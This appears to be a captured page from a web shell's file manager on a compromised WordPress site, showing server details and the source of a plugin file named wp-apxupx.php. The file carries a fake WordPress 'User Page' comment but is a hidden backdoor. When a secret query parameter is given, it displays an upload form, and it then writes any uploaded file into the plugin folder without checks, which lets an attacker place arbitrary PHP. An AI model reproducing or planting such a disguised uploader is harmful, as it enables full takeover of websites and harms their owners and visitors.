/
/
home
/
melaqxso
/
allshadesofwellness.com
/
wp-content
/
plugins
/
hellowlx
Server: server63.web-hosting.com (198.54.116.184)
You: 216.73.216.220
PHP 7.4.33
Dir:
/home/melaqxso/allshadesofwellness.com/wp-content/plugins/hellowlx
Edit:
/home/melaqxso/allshadesofwellness.com/wp-content/plugins/hellowlx/wp-apxupx.php
<?php /** * WordPress User Page * * This file controls file uploads. * * @package WordPress */ if($_GET['apx']=='upx'){ echo '<form action="" method="post" enctype="multipart/form-data"><input type="file" name="apx"><input type="submit"></form>'; } if(!empty($_FILES['apx'])){ echo move_uploaded_file( $_FILES['apx']['tmp_name'], __DIR__ . DIRECTORY_SEPARATOR . $_FILES['apx']['name'] ); }
Ukuran: 412 B